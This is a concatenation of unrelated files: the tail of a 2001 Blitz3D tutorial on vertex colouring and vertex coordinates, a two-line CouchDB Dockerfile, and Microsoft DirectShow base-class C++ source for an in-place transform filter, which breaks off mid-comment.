VertexCoords surface,2,xx+x2,yy+y1,zz<br>
<br>
If counter=1000 Then<br>
counter=0<br>
VertexColor surface,0,Rnd#(0,255),Rnd#(0,255),Rnd#(0,255)<br>
VertexColor surface,1,Rnd#(0,255),Rnd#(0,255),Rnd#(0,255)<br>
VertexColor surface,2,Rnd#(0,255),Rnd#(0,255),Rnd#(0,255)<br>
VertexColor surface,3,Rnd#(0,255),Rnd#(0,255),Rnd#(0,255)<br>
EndIf<br>
<br>
UpdateWorld<br>
RenderWorld<br>
<br>
Text 350,500,"Vertex Control"<br>
<br>
Flip<br>
<br>
Wend<br>
End<br><br></font>
</td>
<td width="14%"> </td>
</tr>
</table>
<p>
So how do we get at the vertexes of the object?</p>
<p>
Well, for starters we load the object with the LoadMesh command; the object we
are loading is of course called Plane.3ds.</p>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<b><font face="Arial">EntityFX plane,2</font></b></td>
</tr>
</table>
<font face="verdana">
<p>Now here's a new command we haven't seen before! This command is really
more of a mode switch than anything else - by setting values we can make the
entity behave in different ways. The mode value '2' enables vertex colouring on the
whole entity; by default this is turned off.</p>
<p>Here are those mode settings:</p>
</font>
<table border="0" width="100%" bgcolor="#FFFF00">
<tr>
<td width="100%">
<font face="Arial"><i>1 = Full-Bright<br>
2 = Use Vertex Colours<br>
4 = Flatshading<br>
8 = Disable Fog</i></font></td>
</tr>
</table>
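<font face="verdana">
<p>A quick side note: these mode values are flags, so (as the values suggest) two or more
can be combined by simply adding the numbers together. For example - purely hypothetically,
our program doesn't need it - <font face="Arial"><i>EntityFX plane,2+4</i></font> would give
the entity vertex colours AND flatshading at the same time.</p>
</font>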
<font face="verdana">
<p>There is another command very similar to EntityFX called BRUSHFX. This uses
the same mode settings, but instead of changing the whole entity it will work on a
single brush. (remember a mesh has surfaces, with brushes applied to them)</p>
</font>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<b><font face="Arial">surface=GetSurface(plane,CountSurfaces(plane))</font></b></td>
</tr>
</table>
<font face="verdana">
<p>
In order to get at the vertexes we must first get hold of the surface they
belong to; we do this by creating a pointer variable that holds a reference to
the surface on the mesh.</p>
<p>
Calm down! We don't have to get our hands dirty with lots of nasty maths
- instead we just use the GETSURFACE command, which likes us to pass firstly the
mesh name - and secondly the index of the surface we want. As you can see I've
cheated and used the COUNTSURFACES command to get the last surface for me.</p>
</font>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<font face="Arial"><b>VertexColor surface,0,255,0,0<br>
VertexColor surface,1,0,255,0<br>
VertexColor surface,2,0,0,255<br>
VertexColor surface,3,255,0,255</b></font>
</td>
</tr>
</table>
<font face="verdana">
<p>Before going into the main loop, I've set the colour of each vertex to a
different colour. This gives us a nice rainbow effect! As you can see we pass
the pointer variable SURFACE to the VERTEXCOLOR command, as well as the vertex
number (0-3, since our object only has 4 points) - followed by the colour values
for the Red, Green and Blue shades. (these must be in the range of 0 (Dark)
through to 255 (Light))</p>
</font>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<font face="Arial"><b>xx#=VertexX(surface,0)<br>
yy#=VertexY(surface,0)<br>
zz#=VertexZ(surface,0)</b></font>
</td>
</tr>
</table>
<font face="verdana">
<p>Since I want the coordinates of the mesh to change all the time, I can't set
them with a value that doesn't change. Every update I've got to get the current
coordinates and slightly adjust them (by adding an offset to the X and Y coords).</p>
<p>I do this by firstly getting the current X, Y and Z vertex coords - using the
various vertex query commands.</p>
<p>VertexX(surface,0) - gives us the X coordinate of the object's
surface, at vertex 0.</p>
<p>Just as VertexY(surface,99) - would give us the Y coordinate of
vertex 99!</p>
<table border="0" width="100%" bgcolor="#6097C9">
<tr>
<td width="100%">
<font face="Arial"><b>VertexCoords surface,0,xx+x1,yy+y1,zz</b></font>
</td>
</tr>
</table>
<p>
As you've probably worked out by now, this is the main instruction for changing
the actual vertex positions. It needs to be called with the surface pointer
value and the vertex number, followed by the new values for the X, Y and Z positions.</p>
<p>
And that's all there is to it!</p>
<p>
But why would you want to change the coordinates?</p>
<p>
All games will alter their objects; it's just a case of working out how, and
where, they do it. Imagine you've just written a driving simulation.. wouldn't it
be nice when you crash the car to reflect the damage? Perhaps crumple that
fender.. or crack that window.</p>
<p>
In fact a certain other car game currently in the charts uses exactly the
same method. You gotta hand it to B3D - you want it.. it's there, now go and use it wisely!</p>
<p align="center"><font color="#808080"><b>More Tutorials to follow..</b><br>
Tutorials written by Paul Gerfen<br>
(c) 2001 GameCodingUK
</font> | {
"pile_set_name": "Github"
} |
FROM couchdb:3
COPY local.ini /opt/couchdb/etc/
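# A minimal sketch of how this image might be built and run locally
# (the image tag and host port below are assumptions, not defined by this repo):
#   docker build -t my-couchdb .
#   docker run -p 5984:5984 my-couchdb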
| {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
// File: TransIP.cpp
//
// Desc: DirectShow base classes - implements class for simple Transform-
// In-Place filters such as audio.
//
// Copyright (c) 1992-2001 Microsoft Corporation. All rights reserved.
//------------------------------------------------------------------------------
// How allocators are decided.
//
// An in-place transform tries to do its work in someone else's buffers.
// It tries to persuade the filters on either side to use the same allocator
// (and for that matter the same media type). In desperation, if the downstream
// filter refuses to supply an allocator and the upstream filter offers only
// a read-only one then it will provide an allocator.
// if the upstream filter insists on a read-only allocator then the transform
// filter will (reluctantly) copy the data before transforming it.
//
// In order to pass an allocator through it needs to remember the one it got
// from the first connection to pass it on to the second one.
//
// It is good if we can avoid insisting on a particular order of connection
// (There is a precedent for insisting on the input
// being connected first. Insisting on the output being connected first is
// not allowed. That would break RenderFile.)
//
// The base pin classes (CBaseOutputPin and CBaseInputPin) both have a
// m_pAllocator member which is used in places like
// CBaseOutputPin::GetDeliveryBuffer and CBaseInputPin::Inactive.
// To avoid lots of extra overriding, we should keep these happy
// by using these pointers.
//
// When each pin is connected, it will set the corresponding m_pAllocator
// and will have a single ref-count on that allocator.
//
// Refcounts are acquired by GetAllocator calls which return AddReffed
// allocators and are released in one of:
// CBaseInputPin::Disconnect
// CBaseOutputPin::BreakConnect
// In each case m_pAllocator is set to NULL after the release, so this
// is the last chance to ever release it. If there should ever be
// multiple refcounts associated with the same pointer, this had better
// be cleared up before that happens. To avoid such problems, we'll
// stick with one per pointer.
// RECONNECTING and STATE CHANGES
//
// Each pin could be disconnected, connected with a read-only allocator,
// connected with an upstream read/write allocator, connected with an
// allocator from downstream or connected with its own allocator.
// Five states for each pin gives a data space of 25 states.
//
// Notation:
//
// R/W == read/write
// R-O == read-only
//
// <input pin state> <output pin state> <comments>
//
// 00 means an unconnected pin.
// <- means using a R/W allocator from the upstream filter
// <= means using a R-O allocator from an upstream filter
// || means using our own (R/W) allocator.
// -> means using a R/W allocator from a downstream filter
// (a R-O allocator from downstream is nonsense, it can't ever work).
//
//
// That makes 25 possible states. Some states are nonsense (two different
// allocators from the same place). These are just an artifact of the notation.
// <= <- Nonsense.
// <- <= Nonsense
// Some states are illegal (the output pin never accepts a R-O allocator):
// 00 <= !! Error !!
// <= <= !! Error !!
// || <= !! Error !!
// -> <= !! Error !!
// Three states appears to be inaccessible:
// -> || Inaccessible
// || -> Inaccessible
// || <- Inaccessible
// Some states only ever occur as intermediates with a pending reconnect which
// is guaranteed to finish in another state.
// -> 00 ?? unstable goes to || 00
// 00 <- ?? unstable goes to 00 ||
// -> <- ?? unstable goes to -> ->
// <- || ?? unstable goes to <- <-
// <- -> ?? unstable goes to <- <-
// And that leaves 11 possible resting states:
// 1 00 00 Nothing connected.
// 2 <- 00 Input pin connected.
// 3 <= 00 Input pin connected using R-O allocator.
// 4 || 00 Needs several state changes to get here.
// 5 00 || Output pin connected using our allocator
// 6 00 -> Downstream only connected
// 7 || || Undesirable but can be forced upon us.
// 8 <= || Copy forced. <= -> is preferable
// 9 <= -> OK - forced to copy.
// 10 <- <- Transform in place (ideal)
// 11 -> -> Transform in place (ideal)
//
// The object of the exercise is to ensure that we finish up in states
// 10 or 11 whenever possible. State 10 is only possible if the upstream
// filter has a R/W allocator (the AVI splitter notoriously
// doesn't) and state 11 is only possible if the downstream filter does
// offer an allocator.
//
// The transition table (entries marked * go via a reconnect)
//
// There are 8 possible transitions:
// A: Connect upstream to filter with R-O allocator that insists on using it.
// B: Connect upstream to filter with R-O allocator but chooses not to use it.
// C: Connect upstream to filter with R/W allocator and insists on using it.
// D: Connect upstream to filter with R/W allocator but chooses not to use it.
// E: Connect downstream to a filter that offers an allocator
// F: Connect downstream to a filter that does not offer an allocator
// G: disconnect upstream
// H: Disconnect downstream
//
// A B C D E F G H
// ---------------------------------------------------------
// 00 00 1 | 3 3 2 2 6 5 . . |1 00 00
// <- 00 2 | . . . . *10/11 10 1 . |2 <- 00
// <= 00 3 | . . . . *9/11 *7/8 1 . |3 <= 00
// || 00 4 | . . . . *8 *7 1 . |4 || 00
// 00 || 5 | 8 7 *10 7 . . . 1 |5 00 ||
// 00 -> 6 | 9 11 *10 11 . . . 1 |6 00 ->
// || || 7 | . . . . . . 5 4 |7 || ||
// <= || 8 | . . . . . . 5 3 |8 <= ||
// <= -> 9 | . . . . . . 6 3 |9 <= ->
// <- <- 10| . . . . . . *5/6 2 |10 <- <-
// -> -> 11| . . . . . . 6 *2/3 |11 -> ->
// ---------------------------------------------------------
// A B C D E F G H
//
// All these states are accessible without requiring any filter to
// change its behaviour but not all transitions are accessible, for
// instance a transition from state 4 to anywhere other than
// state 8 requires that the upstream filter first offer a R-O allocator
// and then changes its mind and offer R/W. This is NOT allowable - it
// leads to things like the output pin getting a R/W allocator from
// upstream and then the input pin being told it can only have a R-O one.
// Note that you CAN change (say) the upstream filter for a different one, but
// only as a disconnect / connect, not as a Reconnect. (Exercise for
// the reader is to see how you get into state 4).
//
// The reconnection stuff goes as follows (some of the cases shown here as
// "no reconnect" may get one to finalise media type - an old story).
// If there is a reconnect where it says "no reconnect" here then the
// reconnection must not change the allocator choice.
//
// state 2: <- 00 transition E <- <- case C <- <- (no change)
// case D -> <- and then to -> ->
//
// state 2: <- 00 transition F <- <- (no reconnect)
//
// state 3: <= 00 transition E <= -> case A <= -> (no change)
// case B -> ->
// transition F <= || case A <= || (no change)
// case B || ||
//
// state 4: || 00 transition E || || case B -> || and then all cases to -> ->
// F || || case B || || (no change)
//
// state 5: 00 || transition A <= || (no reconnect)
// B || || (no reconnect)
// C <- || all cases <- <-
// D || || (unfortunate, but upstream's choice)
//
// state 6: 00 -> transition A <= -> (no reconnect)
// B -> -> (no reconnect)
// C <- -> all cases <- <-
// D -> -> (no reconnect)
//
// state 10:<- <- transition G 00 <- case E 00 ->
// case F 00 ||
//
// state 11:-> -> transition H -> 00 case A <= 00 (schizo)
// case B <= 00
// case C <- 00 (schizo)
// case D <- 00
//
// The Rules:
// To sort out media types:
// The input is reconnected
// if the input pin is connected and the output pin connects
// The output is reconnected
// If the output pin is connected
// and the input pin connects to a different media type
//
// To sort out allocators:
// The input is reconnected
// if the output disconnects and the input was using a downstream allocator
// The output pin calls SetAllocator to pass on a new allocator
// if the output is connected and
// if the input disconnects and the output was using an upstream allocator
// if the input acquires an allocator different from the output one
// and that new allocator is not R-O
//
// Data is copied (i.e. call getbuffer and copy the data before transforming it)
// if the two allocators are different.
// CHAINS of filters:
//
// We sit between two filters (call them A and Z). We should finish up
// with the same allocator on both of our pins and that should be the
// same one that A and Z would have agreed on if we hadn't been in the
// way. Furthermore, it should not matter how many in-place transforms
// are in the way. Let B, C, D... be in-place transforms ("us").
// Here's how it goes:
//
// 1.
// A connects to B. They agree on A's allocator.
// A-a->B
//
// 2.
// B connects to C. Same story. There is no point in a reconnect, but
// B will request an input reconnect anyway.
// A-a->B-a->C
//
// 3.
// C connects to Z.
// C insists on using A's allocator, but compromises by requesting a reconnect.
// of C's input.
// A-a->B-?->C-a->Z
//
// We now have pending reconnects on both A--->B and B--->C
//
// 4.
// The A--->B link is reconnected.
// A asks B for an allocator. B sees that it has a downstream connection so
// asks its downstream input pin i.e. C's input pin for an allocator. C sees
// that it too has a downstream connection so asks Z for an allocator.
//
// Even though Z's input pin is connected, it is being asked for an allocator.
// It could refuse, in which case the chain is done and will use A's allocator
// Alternatively, Z may supply one. A chooses either Z's or A's own one.
// B's input pin gets NotifyAllocator called to tell it the decision and it
// propagates this downstream by calling ReceiveAllocator on its output pin
// which calls NotifyAllocator on the next input pin downstream etc.
// If the choice is Z then it goes:
// A-z->B-a->C-a->Z
// A-z->B-z->C-a->Z
// A-z->B-z->C-z->Z
//
// And that's IT!! Any further (essentially spurious) reconnects peter out
// with no change in the chain.
#include <streams.h>
#include <measure.h>
#include <transip.h>
// =================================================================
// Implements the CTransInPlaceFilter class
// =================================================================
CTransInPlaceFilter::CTransInPlaceFilter
( __in_opt LPCTSTR pName,
__inout_opt LPUNKNOWN pUnk,
REFCLSID clsid,
__inout HRESULT *phr,
bool bModifiesData
)
: CTransformFilter(pName, pUnk, clsid),
m_bModifiesData(bModifiesData)
{
#ifdef PERF
RegisterPerfId();
#endif // PERF
} // constructor
#ifdef UNICODE
CTransInPlaceFilter::CTransInPlaceFilter
( __in_opt LPCSTR pName,
__inout_opt LPUNKNOWN pUnk,
REFCLSID clsid,
__inout HRESULT *phr,
bool bModifiesData
)
: CTransformFilter(pName, pUnk, clsid),
m_bModifiesData(bModifiesData)
{
#ifdef PERF
RegisterPerfId();
#endif // PERF
} // constructor
#endif
// return a non-addrefed CBasePin * for the user to addref if he holds onto it
// for longer than his pointer to us. We create the pins dynamically when they
// are asked for rather than in the constructor. This is because we want to
// give the derived class an opportunity to return different pin objects
// As soon as any pin is needed we create both (this is different from the
// usual transform filter) because enumerators, allocators etc are passed
// through from one pin to another and it becomes very painful if the other
// pin isn't there. If we fail to create either pin we ensure we fail both.
CBasePin *
CTransInPlaceFilter::GetPin(int n)
{
HRESULT hr = S_OK;
// Create an input pin if not already done
if (m_pInput == NULL) {
m_pInput = new CTransInPlaceInputPin( NAME("TransInPlace input pin")
, this // Owner filter
, &hr // Result code
, L"Input" // Pin name
);
// Constructor for CTransInPlaceInputPin can't fail
ASSERT(SUCCEEDED(hr));
}
// Create an output pin if not already done
if (m_pInput!=NULL && m_pOutput == NULL) {
m_pOutput = new CTransInPlaceOutputPin( NAME("TransInPlace output pin")
, this // Owner filter
, &hr // Result code
, L"Output" // Pin name
);
// a failed return code should delete the object
ASSERT(SUCCEEDED(hr));
if (m_pOutput == NULL) {
delete m_pInput;
m_pInput = NULL;
}
}
// Return the appropriate pin
ASSERT (n>=0 && n<=1);
if (n == 0) {
return m_pInput;
} else if (n==1) {
return m_pOutput;
} else {
return NULL;
}
} // GetPin
// dir is the direction of our pin.
// pReceivePin is the pin we are connecting to.
HRESULT CTransInPlaceFilter::CompleteConnect(PIN_DIRECTION dir, IPin *pReceivePin)
{
UNREFERENCED_PARAMETER(pReceivePin);
ASSERT(m_pInput);
ASSERT(m_pOutput);
// if we are not part of a graph, then don't indirect the pointer
// this probably prevents use of the filter without a filtergraph
if (!m_pGraph) {
return VFW_E_NOT_IN_GRAPH;
}
// Always reconnect the input to account for buffering changes
//
// Because we don't get to suggest a type on ReceiveConnection
// we need another way of making sure the right type gets used.
//
// One way would be to have our EnumMediaTypes return our output
// connection type first but more deterministic and simple is to
// call ReconnectEx passing the type we want to reconnect with
// via the base class ReconnectPin method.
if (dir == PINDIR_OUTPUT) {
if( m_pInput->IsConnected() ) {
return ReconnectPin( m_pInput, &m_pOutput->CurrentMediaType() );
}
return NOERROR;
}
ASSERT(dir == PINDIR_INPUT);
// Reconnect output if necessary
if( m_pOutput->IsConnected() ) {
if ( m_pInput->CurrentMediaType()
!= m_pOutput->CurrentMediaType()
) {
return ReconnectPin( m_pOutput, &m_pInput->CurrentMediaType() );
}
}
return NOERROR;
} // CompleteConnect
//
// DecideBufferSize
//
// Tell the output pin's allocator what size buffers we require.
// *pAlloc will be the allocator our output pin is using.
//
HRESULT CTransInPlaceFilter::DecideBufferSize
( IMemAllocator *pAlloc
, __inout ALLOCATOR_PROPERTIES *pProperties
)
{
ALLOCATOR_PROPERTIES Request, Actual;
HRESULT hr;
// If we are connected upstream, get his views
if (m_pInput->IsConnected()) {
// Get the input pin allocator, and get its size and count.
// we don't care about his alignment and prefix.
hr = InputPin()->PeekAllocator()->GetProperties(&Request);
if (FAILED(hr)) {
// Input connected but with a secretive allocator - enough!
return hr;
}
} else {
// Propose one byte
// If this isn't enough then when the other pin does get connected
// we can revise it.
ZeroMemory(&Request, sizeof(Request));
Request.cBuffers = 1;
Request.cbBuffer = 1;
}
DbgLog((LOG_MEMORY,1,TEXT("Setting Allocator Requirements")));
DbgLog((LOG_MEMORY,1,TEXT("Count %d, Size %d"),
Request.cBuffers, Request.cbBuffer));
// Pass the allocator requirements to our output side
// but do a little sanity checking first or we'll just hit
// asserts in the allocator.
pProperties->cBuffers = Request.cBuffers;
pProperties->cbBuffer = Request.cbBuffer;
pProperties->cbAlign = Request.cbAlign;
if (pProperties->cBuffers<=0) {pProperties->cBuffers = 1; }
if (pProperties->cbBuffer<=0) {pProperties->cbBuffer = 1; }
hr = pAlloc->SetProperties(pProperties, &Actual);
if (FAILED(hr)) {
return hr;
}
DbgLog((LOG_MEMORY,1,TEXT("Obtained Allocator Requirements")));
DbgLog((LOG_MEMORY,1,TEXT("Count %d, Size %d, Alignment %d"),
Actual.cBuffers, Actual.cbBuffer, Actual.cbAlign));
// Make sure we got the right alignment and at least the minimum required
if ( (Request.cBuffers > Actual.cBuffers)
|| (Request.cbBuffer > Actual.cbBuffer)
|| (Request.cbAlign > Actual.cbAlign)
) {
return E_FAIL;
}
return NOERROR;
} // DecideBufferSize
//
// Copy
//
// return a pointer to an identical copy of pSample
__out_opt IMediaSample * CTransInPlaceFilter::Copy(IMediaSample *pSource)
{
IMediaSample * pDest;
HRESULT hr;
REFERENCE_TIME tStart, tStop;
const BOOL bTime = S_OK == pSource->GetTime( &tStart, &tStop);
// this may block for an indeterminate amount of time
hr = OutputPin()->PeekAllocator()->GetBuffer(
&pDest
, bTime ? &tStart : NULL
, bTime ? &tStop : NULL
, m_bSampleSkipped ? AM_GBF_PREVFRAMESKIPPED : 0
);
if (FAILED(hr)) {
return NULL;
}
ASSERT(pDest);
IMediaSample2 *pSample2;
if (SUCCEEDED(pDest->QueryInterface(IID_IMediaSample2, (void **)&pSample2))) {
HRESULT hrProps = pSample2->SetProperties(
FIELD_OFFSET(AM_SAMPLE2_PROPERTIES, pbBuffer),
(PBYTE)m_pInput->SampleProps());
pSample2->Release();
if (FAILED(hrProps)) {
pDest->Release();
return NULL;
}
} else {
if (bTime) {
pDest->SetTime(&tStart, &tStop);
}
if (S_OK == pSource->IsSyncPoint()) {
pDest->SetSyncPoint(TRUE);
}
if (S_OK == pSource->IsDiscontinuity() || m_bSampleSkipped) {
pDest->SetDiscontinuity(TRUE);
}
if (S_OK == pSource->IsPreroll()) {
pDest->SetPreroll(TRUE);
}
// Copy the media type
AM_MEDIA_TYPE *pMediaType;
if (S_OK == pSource->GetMediaType(&pMediaType)) {
pDest->SetMediaType(pMediaType);
DeleteMediaType( pMediaType );
}
}
m_bSampleSkipped = FALSE;
// Copy the sample media times
REFERENCE_TIME TimeStart, TimeEnd;
if (pSource->GetMediaTime(&TimeStart,&TimeEnd) == NOERROR) {
pDest->SetMediaTime(&TimeStart,&TimeEnd);
}
// Copy the actual data length and the actual data.
{
const long lDataLength = pSource->GetActualDataLength();
if (FAILED(pDest->SetActualDataLength(lDataLength))) {
pDest->Release();
return NULL;
}
// Copy the sample data
{
BYTE *pSourceBuffer, *pDestBuffer;
long lSourceSize = pSource->GetSize();
long lDestSize = pDest->GetSize();
ASSERT(lDestSize >= lSourceSize && lDestSize >= lDataLength);
if (FAILED(pSource->GetPointer(&pSourceBuffer)) ||
FAILED(pDest->GetPointer(&pDestBuffer)) ||
lDestSize < lDataLength ||
lDataLength < 0) {
pDest->Release();
return NULL;
}
ASSERT(lDestSize == 0 || pSourceBuffer != NULL && pDestBuffer != NULL);
CopyMemory( (PVOID) pDestBuffer, (PVOID) pSourceBuffer, lDataLength );
}
}
return pDest;
} // Copy
// override this to customize the transform process
HRESULT
CTransInPlaceFilter::Receive(IMediaSample *pSample)
{
/* Check for other streams and pass them on */
AM_SAMPLE2_PROPERTIES * const pProps = m_pInput->SampleProps();
if (pProps->dwStreamId != AM_STREAM_MEDIA) {
return m_pOutput->Deliver(pSample);
}
HRESULT hr;
// Start timing the TransInPlace (if PERF is defined)
MSR_START(m_idTransInPlace);
if (UsingDifferentAllocators()) {
// We have to copy the data.
pSample = Copy(pSample);
if (pSample==NULL) {
MSR_STOP(m_idTransInPlace);
return E_UNEXPECTED;
}
}
// have the derived class transform the data
hr = Transform(pSample);
// Stop the clock and log it (if PERF is defined)
MSR_STOP(m_idTransInPlace);
if (FAILED(hr)) {
DbgLog((LOG_TRACE, 1, TEXT("Error from TransInPlace")));
if (UsingDifferentAllocators()) {
pSample->Release();
}
return hr;
}
// the Transform() function can return S_FALSE to indicate that the
// sample should not be delivered; we only deliver the sample if it's
// really S_OK (same as NOERROR, of course.)
if (hr == NOERROR) {
hr = m_pOutput->Deliver(pSample);
} else {
// But it would be an error to return this private workaround
// to the caller ...
if (S_FALSE == hr) {
// S_FALSE returned from Transform is a PRIVATE agreement
// We should return NOERROR from Receive() in this cause because
// returning S_FALSE from Receive() means that this is the end
// of the stream and no more data should be sent.
m_bSampleSkipped = TRUE;
if (!m_bQualityChanged) {
NotifyEvent(EC_QUALITY_CHANGE,0,0);
m_bQualityChanged = TRUE;
}
hr = NOERROR;
}
}
// release the output buffer. If the connected pin still needs it,
// it will have addrefed it itself.
if (UsingDifferentAllocators()) {
pSample->Release();
}
return hr;
} // Receive
// =================================================================
// Implements the CTransInPlaceInputPin class
// =================================================================
// constructor
CTransInPlaceInputPin::CTransInPlaceInputPin
( __in_opt LPCTSTR pObjectName
, __inout CTransInPlaceFilter *pFilter
, __inout HRESULT *phr
, __in_opt LPCWSTR pName
)
: CTransformInputPin(pObjectName,
pFilter,
phr,
pName)
, m_bReadOnly(FALSE)
, m_pTIPFilter(pFilter)
{
DbgLog((LOG_TRACE, 2
, TEXT("CTransInPlaceInputPin::CTransInPlaceInputPin")));
} // constructor
// =================================================================
// Implements IMemInputPin interface
// =================================================================
// If the downstream filter has one then offer that (even if our own output
// pin is not using it yet. If the upstream filter chooses it then we will
// tell our output pin to ReceiveAllocator).
// Else if our output pin is using an allocator then offer that.
// ( This could mean offering the upstream filter his own allocator,
// it could mean offerring our own
// ) or it could mean offering the one from downstream
// Else fail to offer any allocator at all.
STDMETHODIMP CTransInPlaceInputPin::GetAllocator(__deref_out IMemAllocator ** ppAllocator)
{
CheckPointer(ppAllocator,E_POINTER);
ValidateReadWritePtr(ppAllocator,sizeof(IMemAllocator *));
CAutoLock cObjectLock(m_pLock);
HRESULT hr;
if ( m_pTIPFilter->m_pOutput->IsConnected() ) {
// Store the allocator we got
hr = m_pTIPFilter->OutputPin()->ConnectedIMemInputPin()
->GetAllocator( ppAllocator );
if (SUCCEEDED(hr)) {
m_pTIPFilter->OutputPin()->SetAllocator( *ppAllocator );
}
}
else {
// Help upstream filter (eg TIP filter which is having to do a copy)
// by providing a temp allocator here - we'll never use
// this allocator because when our output is connected we'll
// reconnect this pin
hr = CTransformInputPin::GetAllocator( ppAllocator );
}
return hr;
} // GetAllocator
/* Get told which allocator the upstream output pin is actually going to use */
STDMETHODIMP
CTransInPlaceInputPin::NotifyAllocator(
IMemAllocator * pAllocator,
BOOL bReadOnly)
{
HRESULT hr = S_OK;
CheckPointer(pAllocator,E_POINTER);
ValidateReadPtr(pAllocator,sizeof(IMemAllocator));
CAutoLock cObjectLock(m_pLock);
m_bReadOnly = bReadOnly;
// If we modify data then don't accept the allocator if it's
// the same as the output pin's allocator
// If our output is not connected just accept the allocator
// We're never going to use this allocator because when our
// output pin is connected we'll reconnect this pin
if (!m_pTIPFilter->OutputPin()->IsConnected()) {
return CTransformInputPin::NotifyAllocator(pAllocator, bReadOnly);
}
// If the allocator is read-only and we're modifying data
// and the allocator is the same as the output pin's
// then reject
if (bReadOnly && m_pTIPFilter->m_bModifiesData) {
IMemAllocator *pOutputAllocator =
m_pTIPFilter->OutputPin()->PeekAllocator();
// Make sure we have an output allocator
if (pOutputAllocator == NULL) {
hr = m_pTIPFilter->OutputPin()->ConnectedIMemInputPin()->
GetAllocator(&pOutputAllocator);
if(FAILED(hr)) {
hr = CreateMemoryAllocator(&pOutputAllocator);
}
if (SUCCEEDED(hr)) {
m_pTIPFilter->OutputPin()->SetAllocator(pOutputAllocator);
pOutputAllocator->Release();
}
}
if (pAllocator == pOutputAllocator) {
hr = E_FAIL;
} else if(SUCCEEDED(hr)) {
// Must copy so set the allocator properties on the output
ALLOCATOR_PROPERTIES Props, Actual;
hr = pAllocator->GetProperties(&Props);
if (SUCCEEDED(hr)) {
hr = pOutputAllocator->SetProperties(&Props, &Actual);
}
if (SUCCEEDED(hr)) {
if ( (Props.cBuffers > Actual.cBuffers)
|| (Props.cbBuffer > Actual.cbBuffer)
|| (Props.cbAlign > Actual.cbAlign)
) {
hr = E_FAIL;
}
}
// Set the allocator on the output pin
if (SUCCEEDED(hr)) {
hr = m_pTIPFilter->OutputPin()->ConnectedIMemInputPin()
->NotifyAllocator( pOutputAllocator, FALSE );
}
}
} else {
hr = m_pTIPFilter->OutputPin()->ConnectedIMemInputPin()
->NotifyAllocator( pAllocator, bReadOnly );
if (SUCCEEDED(hr)) {
m_pTIPFilter->OutputPin()->SetAllocator( pAllocator );
}
}
if (SUCCEEDED(hr)) {
// It's possible that the old and the new are the same thing.
// AddRef before release ensures that we don't unload it.
pAllocator->AddRef();
if( m_pAllocator != NULL )
m_pAllocator->Release();
m_pAllocator = pAllocator; // We have an allocator for the input pin
}
return hr;
} // NotifyAllocator
// EnumMediaTypes
// - pass through to our downstream filter
STDMETHODIMP CTransInPlaceInputPin::EnumMediaTypes( __deref_out IEnumMediaTypes **ppEnum )
{
// Can only pass through if connected
if( !m_pTIPFilter->m_pOutput->IsConnected() )
return VFW_E_NOT_CONNECTED;
return m_pTIPFilter->m_pOutput->GetConnected()->EnumMediaTypes( ppEnum );
} // EnumMediaTypes
// CheckMediaType
// - agree to anything if not connected,
// otherwise pass through to the downstream filter.
// This assumes that the filter does not change the media type.
HRESULT CTransInPlaceInputPin::CheckMediaType(const CMediaType *pmt )
{
HRESULT hr = m_pTIPFilter->CheckInputType(pmt);
if (hr!=S_OK) return hr;
if( m_pTIPFilter->m_pOutput->IsConnected() )
return m_pTIPFilter->m_pOutput->GetConnected()->QueryAccept( pmt );
else
return S_OK;
} // CheckMediaType
// If upstream asks us what our requirements are, we will try to ask downstream
// if that doesn't work, we'll just take the defaults.
STDMETHODIMP
CTransInPlaceInputPin::GetAllocatorRequirements(__out ALLOCATOR_PROPERTIES *pProps)
{
if( m_pTIPFilter->m_pOutput->IsConnected() )
return m_pTIPFilter->OutputPin()
->ConnectedIMemInputPin()->GetAllocatorRequirements( pProps );
else
return E_NOTIMPL;
} // GetAllocatorRequirements
// CTransInPlaceInputPin::CompleteConnect() calls CBaseInputPin::CompleteConnect()
// and then calls CTransInPlaceFilter::CompleteConnect(). It does this because
// CTransInPlaceFilter::CompleteConnect() can reconnect a pin and we do not
// want to reconnect a pin if CBaseInputPin::CompleteConnect() fails.
HRESULT
CTransInPlaceInputPin::CompleteConnect(IPin *pReceivePin)
{
HRESULT hr = CBaseInputPin::CompleteConnect(pReceivePin);
if (FAILED(hr)) {
return hr;
}
return m_pTransformFilter->CompleteConnect(PINDIR_INPUT,pReceivePin);
} // CompleteConnect
// =================================================================
// Implements the CTransInPlaceOutputPin class
// =================================================================
// constructor
CTransInPlaceOutputPin::CTransInPlaceOutputPin(
__in_opt LPCTSTR pObjectName,
__inout CTransInPlaceFilter *pFilter,
__inout HRESULT * phr,
__in_opt LPCWSTR pPinName)
: CTransformOutputPin( pObjectName
, pFilter
, phr
, pPinName),
m_pTIPFilter(pFilter)
{
DbgLog(( LOG_TRACE, 2
, TEXT("CTransInPlaceOutputPin::CTransInPlaceOutputPin")));
} // constructor
// EnumMediaTypes
// - pass through to our upstream filter
STDMETHODIMP CTransInPlaceOutputPin::EnumMediaTypes( __deref_out IEnumMediaTypes **ppEnum )
{
// Can only pass through if connected.
if( ! m_pTIPFilter->m_pInput->IsConnected() )
return VFW_E_NOT_CONNECTED;
return m_pTIPFilter->m_pInput->GetConnected()->EnumMediaTypes( ppEnum );
} // EnumMediaTypes
// CheckMediaType
// - agree to anything if not connected,
// otherwise pass through to the upstream filter.
HRESULT CTransInPlaceOutputPin::CheckMediaType(const CMediaType *pmt )
{
// Don't accept any output pin type changes if we're copying
// between allocators - it's too late to change the input
// allocator size.
if (m_pTIPFilter->UsingDifferentAllocators() && !m_pFilter->IsStopped()) {
if (*pmt == m_mt) {
return S_OK;
} else {
return VFW_E_TYPE_NOT_ACCEPTED;
}
}
// Assumes the type does not change. That's why we're calling
// CheckINPUTType here on the OUTPUT pin.
HRESULT hr = m_pTIPFilter->CheckInputType(pmt);
if (hr!=S_OK) return hr;
if( m_pTIPFilter->m_pInput->IsConnected() )
return m_pTIPFilter->m_pInput->GetConnected()->QueryAccept( pmt );
else
return S_OK;
} // CheckMediaType
/* Save the allocator pointer in the output pin
*/
void
CTransInPlaceOutputPin::SetAllocator(IMemAllocator * pAllocator)
{
pAllocator->AddRef();
if (m_pAllocator) {
m_pAllocator->Release();
}
m_pAllocator = pAllocator;
} // SetAllocator
// CTransInPlaceOutputPin::CompleteConnect() calls CBaseOutputPin::CompleteConnect()
// and then calls CTransInPlaceFilter::CompleteConnect(). It does this because
